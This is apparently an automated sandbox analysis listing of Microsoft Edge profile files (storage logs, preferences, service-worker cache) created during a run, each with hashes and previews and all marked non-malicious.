SHA1:AE8C471A23A49858E6C4D20B73F56279079E7141
SHA-256:7313007ADFA61756FF605F61F053CEF8F28467485E9EA40FC87DD45854E68701
SHA-512:A32E1B780BAE30A25E78DCD6EB432A740E5D5010F55452FA30DF17411E13CD64CBAEA9A69DC224E7931D84C8A5CDF4C103A209465ACDCF228601B6D836166264
Malicious:false
Reputation:unknown
Preview:D.:v.................VERSION.1..META:https://ntp.msn.com............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":994}.!_https://ntp.msn.com..LastKnownPV..1719381175488.-_https://ntp.msn.com..LastVisuallyReadyMarker..1719381176508.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1719381175554,"schedule":[-1,-1,27,4,-1,14,-1],"scheduleFixed":[-1,-1,27,4,-1,14,-1],"simpleSchedule":[48,21,42,44,19,45,46]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20240624.594"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed. _https://ntp.msn.com..simpleBkgd..{"videoTogglePreFlight":false}.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Wed Jun 26 2024 01:52:54 GMT-0400 (Eastern Daylight Time).!_https://

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):329
Entropy (8bit):5.159200808133351
Encrypted:false
SSDEEP:
MD5:F76F48ABFC0BF77F3B0FB1613A13D47C
SHA1:D2DB50E673098C88558C6A7F77E27A02DBC236E3
SHA-256:6C0EF5603143374661F8FD7DEA85B5FB991403D04C5864D737D9E5ADC406F7E5
SHA-512:69AB6E58E3B3B82541B901EE7A02DFD1493658739BD5FBD6EB0ABB18472D6261FD8095F0111AB07FFCDEF4570974DB4BA0EDC72C79FFA9A596713AA718029071
Malicious:false
Reputation:unknown
Preview:2024/06/26-01:52:47.780 280 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/06/26-01:52:47.782 280 Recovering log #3.2024/06/26-01:52:47.786 280 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\5c3a494a-698f-4026-9715-61022375348d.tmp

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):111
Entropy (8bit):4.718418993774295
Encrypted:false
SSDEEP:
MD5:285252A2F6327D41EAB203DC2F402C67
SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
Malicious:false
Reputation:unknown
Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
Category:dropped
Size (bytes):20480
Entropy (8bit):2.847162815759683
Encrypted:false
SSDEEP:
MD5:84A94CA2F4E77A33109337FCE2CFA18F
SHA1:7C2E9477E82936017D1B1C5CF8791DFE44F66154
SHA-256:47F8C28663BE746AF28F330E8E4EFD75FDE32D7B5E80E7D23FE587CAB420D6A2
SHA-512:B261942FE62BD525ACADCCE576F9FF5C34C66ABDBCFBD3AF4DA059F6EF90F016044E0694070D14698BCBCCF6F29403F708B28F6620EC00BAD3D4A57AA7339ED8
Malicious:false
Reputation:unknown
Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:
MD5:285252A2F6327D41EAB203DC2F402C67
SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
Malicious:false
Reputation:unknown
Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
Category:modified
Size (bytes):36864
Entropy (8bit):1.386152424993815
Encrypted:false
SSDEEP:
MD5:5D4D87816BE472497E4B8E2B0ADB7FD9
SHA1:AB6420E983ACD77AA9942A445DB37EFAD59D8F35
SHA-256:C266E6F83F54C3C3470E4641B5DBF85FF4A104CE8D2758656B073AF4DD639470
SHA-512:E6793CD4773424A35ABEBA59A460F827D27628FC8359A51A4E11DFD51929BDE1D3D5A260843D8957FF275F780AB53E2F6E15A7DF48FEFEFD16F274691F2DDB41
Malicious:false
Reputation:unknown
Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:
MD5:20D4B8FA017A12A108C87F540836E250
SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:false
Reputation:unknown
Preview:{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f86b77d1-ef50-4969-8c24-c5260f21c4dc.tmp

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):40
Entropy (8bit):4.1275671571169275
Encrypted:false
SSDEEP:
MD5:20D4B8FA017A12A108C87F540836E250
SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:false
Reputation:unknown
Preview:{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):20480
Entropy (8bit):0.8024195212890469
Encrypted:false
SSDEEP:
MD5:46EDAE9A257690D0F0113262903FC779
SHA1:3743EBAEA077D0970A30B40EA36135C8EAB0BDAC
SHA-256:A17EE4A87C39F35505B7CF9715E0F63F87F62DDDD9956569774AE6664B3C4BA1
SHA-512:663973F9EA720B3FBEA37008253A9D21734589FD34A88F8739D71CDEDBEA67A49BE45DEFE5E3F7D75EF1EA018EAAC39948BCE0305FC8332921A63B23880E8912
Malicious:false
Reputation:unknown
Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:Unicode text, UTF-8 text, with very long lines (16388), with no line terminators
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:
MD5:32583DD225AADB0233DD9FCFBBCFCB45
SHA1:9DA1ACE60F34C0373AEAECDFC94EB8B95A0BDE9D
SHA-256:868A8BB16580C6CBF398A05C3CF925F2A6248DCFAB0428909A277B2155BF27C3
SHA-512:C15BABCE2727713D12706D2C0813C2DACE693B9CD7F58482081557EFA6F9D45520BD3F8A9581DF8C6FE97EC87528192A38ABA344F6AB74EB4347417220DE04DF
Malicious:false
Reputation:unknown
Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13363854768071949","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341058280410352","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b6496

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF30773.TMP (copy)

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:Unicode text, UTF-8 text, with very long lines (16388), with no line terminators
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:
MD5:32583DD225AADB0233DD9FCFBBCFCB45
SHA1:9DA1ACE60F34C0373AEAECDFC94EB8B95A0BDE9D
SHA-256:868A8BB16580C6CBF398A05C3CF925F2A6248DCFAB0428909A277B2155BF27C3
SHA-512:C15BABCE2727713D12706D2C0813C2DACE693B9CD7F58482081557EFA6F9D45520BD3F8A9581DF8C6FE97EC87528192A38ABA344F6AB74EB4347417220DE04DF
Malicious:false
Reputation:unknown
Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13363854768071949","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341058280410352","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b6496

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF34ae5.TMP (copy)

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:Unicode text, UTF-8 text, with very long lines (16388), with no line terminators
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:
MD5:32583DD225AADB0233DD9FCFBBCFCB45
SHA1:9DA1ACE60F34C0373AEAECDFC94EB8B95A0BDE9D
SHA-256:868A8BB16580C6CBF398A05C3CF925F2A6248DCFAB0428909A277B2155BF27C3
SHA-512:C15BABCE2727713D12706D2C0813C2DACE693B9CD7F58482081557EFA6F9D45520BD3F8A9581DF8C6FE97EC87528192A38ABA344F6AB74EB4347417220DE04DF
Malicious:false
Reputation:unknown
Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13363854768071949","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341058280410352","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b6496

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:
MD5:BAFEE66EAEDFBD1CE97813D2AECB9502
SHA1:84F1B9BF5206D1BB2E6B82DBA700AC1FAC7289BE
SHA-256:6AE3AB1C6E730A5539AD828C78316EFD42551CD4E2699F0DD22A567CDC2270CB
SHA-512:4BF869B6C327776FA128CA867F1B3AEB858EE87873CB0E7966B704143EB2504530D5189CC246CE37ABD9783402EEEC2E92A2392A2754C743192EF2F84555C0FF
Malicious:false
Reputation:unknown
Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13363854767654649","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13363854767654649","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3152f.TMP (copy)

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:
MD5:BAFEE66EAEDFBD1CE97813D2AECB9502
SHA1:84F1B9BF5206D1BB2E6B82DBA700AC1FAC7289BE
SHA-256:6AE3AB1C6E730A5539AD828C78316EFD42551CD4E2699F0DD22A567CDC2270CB
SHA-512:4BF869B6C327776FA128CA867F1B3AEB858EE87873CB0E7966B704143EB2504530D5189CC246CE37ABD9783402EEEC2E92A2392A2754C743192EF2F84555C0FF
Malicious:false
Reputation:unknown
Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13363854767654649","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13363854767654649","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):209
Entropy (8bit):4.781750903806468
Encrypted:false
SSDEEP:
MD5:7C1B96DAB9280D6BA57513C7B67D992F
SHA1:B2EE388821413E5CE5D9ECD38998F71B23FFCC69
SHA-256:103E2BB870EF8E0155FCAEE58BB8B3421B45B580F087A72E59F67C1205C4422B
SHA-512:765944240657437099C01890941F471D54F628E611E51DF6F50D8CA2902D874E98C664EBDBBFDC1C63E7BCADCFDC006D0B2D0DBC7B6FA4B6D790E859EF3C8D5D
Malicious:false
Reputation:unknown
Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2r..;................REG:https://ntp.msn.com/.0..REGID_TO_ORIGIN:0MeN+.................URES:0..PRES:0.J4...................PRES:0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):295
Entropy (8bit):5.1273773355011665
Encrypted:false
SSDEEP:
MD5:F28C68AC57FFB10E218BB742BEBF64F8
SHA1:0F994D32A267344C27C2E0633FBEBE46021B7273
SHA-256:D5EB06BD684ACE305AB45551EE380A6F05ECB125A61E604B0350462F688D7998
SHA-512:366CEF37E9CBBD14C2382AAEDDE8501D529D51C84F6FF1FB1AA187A008A8DAA7920C5988C9E0AD0C263C5F11C028E54AEF36E258BA8CD27F42E5D1085045CAAC
Malicious:false
Reputation:unknown
Preview:2024/06/26-01:52:56.499 1ee0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/06/26-01:52:56.528 1ee0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):109240
Entropy (8bit):5.583058438260498
Encrypted:false
SSDEEP:
MD5:E99DA382781F6E54BEFFE0DD2BCAE743
SHA1:155E87E98B5163C14D47CD61F9574D4A1A8E4C71
SHA-256:A2F8655324DDDDCD5F2D4C6C3647B6B81EFDB75F1B382ACE2F9A158FBF0079F4
SHA-512:4A74B2B2EF5ABF53AB5E164371A614806B2D7428BFC4308F8D70E10C92C478839680838D3883F069D401937F9C479710B4677600F9CB00648A77B689BE0EEDEC
Malicious:false
Reputation:unknown
Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):181105
Entropy (8bit):6.369434589475357
Encrypted:false
SSDEEP:
MD5:3C78BAA6831A23AC1E8479CFACD01409
SHA1:8805548BA962145F4E75C208535D2D7C381AEDD2
SHA-256:33ECEFFEA9CDE22BAB8FADB3FEDC8910CBE787DCF0953A532595109A05EBA418
SHA-512:A7CADF76C30D4269D3094E727B88C61E5D9FE686A26D7E1657BD2E1EC8D9F1A2EF50D715F1BECDE72143C28D27A985BDEE36E0C5C94E9B9404D85312876B2AFD
Malicious:false
Reputation:unknown
Preview:0\r..m..........rSG.....0....Lp.................;.......*.........,T.8..`,.....L`.....,T...`......L`......Rc........exports...Rc.v......module....Rc6.......define....Rb......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H.......Q....y....https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&enableNetworkFirst=true&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true...a........Db............D`........A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....j1...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4.........../...-..........\....-........(Sb.............q.`....Da....z....T...d..........0..........0e........@............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):48
Entropy (8bit):2.955557653394731
Encrypted:false
SSDEEP:
MD5:22F73B091B4CAF66B68BD75FF748694A
SHA1:8DEA4E2B8F9CBA0060070F65C46A904F24D15841
SHA-256:94A34D109747A29013924208054AB6758C1F5AFF8EDB4EA9F2F6DF2034317C90
SHA-512:F329FE2E44393AB52139EBCF446A43CF06A86721682B113C0C543F86B705D4250C84F1D5262949D48A44FBC1224086BF831B8C0E36C5F411024C91BD50F7382D
Malicious:false
Reputation:unknown
Preview:(....nD.oy retne........................^...Zz/.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:
MD5:2D0194AD01805735E0D999B78DA505AB
SHA1:A4A51FEC13403D7984F43BBFB72B3CAB1A71D473
SHA-256:97223EB5BD840B4D864BC467CF1EAB590CC26E718934E4EBDCBB1556592C08C9
SHA-512:B694D2015BA36816D54884818E843E1A9608FE5440F024850B2FB746734C5A367C6CAE9E1395196CD690AE9F1EE7A0E7F945BE9F2D3C6F042492B9991DF537C7
Malicious:false
Reputation:unknown
Preview:(...g...oy retne........................8...Zz/.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF3353a.TMP (copy)

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):0
Entropy (8bit):0.0
Encrypted:false
SSDEEP:
MD5:2D0194AD01805735E0D999B78DA505AB
SHA1:A4A51FEC13403D7984F43BBFB72B3CAB1A71D473
SHA-256:97223EB5BD840B4D864BC467CF1EAB590CC26E718934E4EBDCBB1556592C08C9
SHA-512:B694D2015BA36816D54884818E843E1A9608FE5440F024850B2FB746734C5A367C6CAE9E1395196CD690AE9F1EE7A0E7F945BE9F2D3C6F042492B9991DF537C7
Malicious:false
Reputation:unknown
Preview:(...g...oy retne........................8...Zz/.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):6643
Entropy (8bit):3.3870374725231613
Encrypted:false
SSDEEP:
MD5:5D416A3C6623BDB1ED72AEB14AD35A00
SHA1:24BC80B751B75190E0707BFCD8FAD7701164DE23
SHA-256:7920E15C7332CD69722CF729B9BFFEE73F268E4EBAFD76401FBF6E8794964838
SHA-512:C9BE55B9A6ED9DFC93452CF408BEA0CFEDDEFAE79D0C12F5FDBA684AC8D61DCB4236DAC3634924ECDFA193AF8CD80987A3F189813A9583E7B5010D0005B6CAAF
Malicious:false
Reputation:unknown
Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................$.b................next-map-id.1.Cnamespace-a872195b_d975_4bf5_8be0_a836e1c530c1-https://ntp.msn.com/.0.....................map-0-shd_sweeper.0{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.1.s.-.t.p.s.n.-.e.a.t.t.m.h.p.-.c.,.a.d.s.-.c.b.c.o.n.t.r.o.l.-.1.,.c.p.r.g.-.w.p.o.r.v.r.-.d.c.p.l.,.1.s.-.w.p.o.-.v.i.e.w.s.i.n.f.v.4.,.p.r.e.a.u.t.h.-.c.o.o.k.i.e.s.-.d.b.g.,.p.r.g.-.1.s.w.-.s.a.w.-.w.e.b.0.9.c.,.p.r.g.-.1.s.w.-.s.a.-.g.p.t.q.u.o.t.a.-.c.,.p.r.g.-.p.w.-.i.n.f.o.p.a.n.e.1.t.,.1.s.-.w.p.o.-.b.h.p.i.n.f.o.p.,.p.r.g.-.1.s.-.b.i.n.g.h.p.t.s.,.p.r.g.-.p.w.-.i.p.f.l.i.p.p.e.r.l.,.p.r.g.-.1.s.w.-.s.p.d.p.t.c.f.,.1.s.-.w.p.o.-.p.r.1.-.n.o.r.e.w.e.i.g.h.t.,.p.r.g.-.1.s.w.-.s.h.p.i.c.h.d.r.2.,.p.r.g.-.p.r.1.-.s.v.g.a.n.i.m.a.t.,.1.s.-.t.p.s.n.-.e.a.t.t.w.h.p.-.c.,.i.f.r.a.m.e.f.l.e.x.,.p.r.g.-.a.d.s.p.e.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:ASCII text
Category:dropped
Size (bytes):317
Entropy (8bit):5.133569425570459
Encrypted:false
SSDEEP:
MD5:FFF73FC1AECAB1D0DFCF3760F011A1DF
SHA1:C7A63EECBD14D39303992E4E5D76AAD3D297EF71
SHA-256:F7D4DFAB02AD878A1A6046DCEF22FCE1918197F46DBE5853F0531A4543FCC925
SHA-512:23CBF82F61B1A089E40AD19EC0FA9B04174BF5CBFCDB0419AC6B475C4C9B238D1A7118AB3CAF0E30D5E41D3D4B5876FF659E83A1A59615C8C8EDC28C497C3201
Malicious:false
Reputation:unknown
Preview:2024/06/26-01:52:48.090 280 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/06/26-01:52:48.114 280 Recovering log #3.2024/06/26-01:52:48.127 280 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13363854770154253

Download File
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):1443
Entropy (8bit):3.848981996363301
Encrypted:false
SSDEEP:
MD5:AEA5CBC593979EBFBA167510A1CD2F5C
SHA1:AC2580E7D56C3026699DEED4E47A44783B62F493
SHA-256:4DD48F19F6D5C61C4D4F8B9433BD0B94CB31A6F0C90F27D1DF9CAB964D7D56C3
SHA-512:C25C8D49C07D0F144DA9BE3E9CA4FA75E636FF039E4999E42B5F1F45821334860E9699533CB04707394CA250B8412DB9190E04740E7F7EDC1D2D3C43392F1FB7
Malicious:false
Reputation:unknown
